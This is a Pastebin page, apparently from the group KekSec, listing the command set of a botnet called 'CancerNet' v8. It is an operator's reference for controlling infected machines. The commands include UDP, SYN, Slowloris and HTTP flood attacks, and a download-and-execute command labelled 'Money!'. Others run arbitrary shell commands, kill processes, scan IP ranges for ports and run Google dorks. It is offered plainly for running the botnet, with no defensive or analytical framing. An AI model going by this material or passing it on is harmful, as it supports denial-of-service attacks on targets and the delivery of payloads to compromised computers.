Advertisement
KekSec

Commands for v8

Jan 22nd, 2015
662
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.06 KB | None | 0 0
  1. CancerNet bot commands
  2.  
  3. * DDoS commands
  4. ddos.udpflood [host] [port, 0 for random] [size] [time] - UDP flood
  5. ddos.synflood [host] [port] [time] - SYN flood
  6. ddos.slowloris [host] [port] [sockets] [time] - Slowloris
  7. ddos.httpflood [ip] [port] [time] - HTTP flood
  8.  
  9. * Security commands
  10. bot.repack - repacks the bot
  11. bot.reset - resets the bot
  12. bot.move [server] [channel] [channel key] - moves the bot
  13.  
  14. * Money!
  15. http.execute [url] [filename] - download and execute from url
  16.  
  17. * Process commands:
  18. bot.tasklist - get process list
  19. bot.killbypid [pid] - kills specific pid
  20. bot.killbyname [process name] - kills process by exe name
  21.  
  22. * Other commands:
  23. bot.restart - restarts bot
  24. bot.shutdown - shutdowns bot
  25. http.download [url] [filename] - download something from a url
  26. bot.scannetrange [ex: 192.168.1-255.1-255] [port] - scan ip ranges for a port
  27. bot.googledork [dork] - google dorks
  28. bot.shell [command] - run command
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement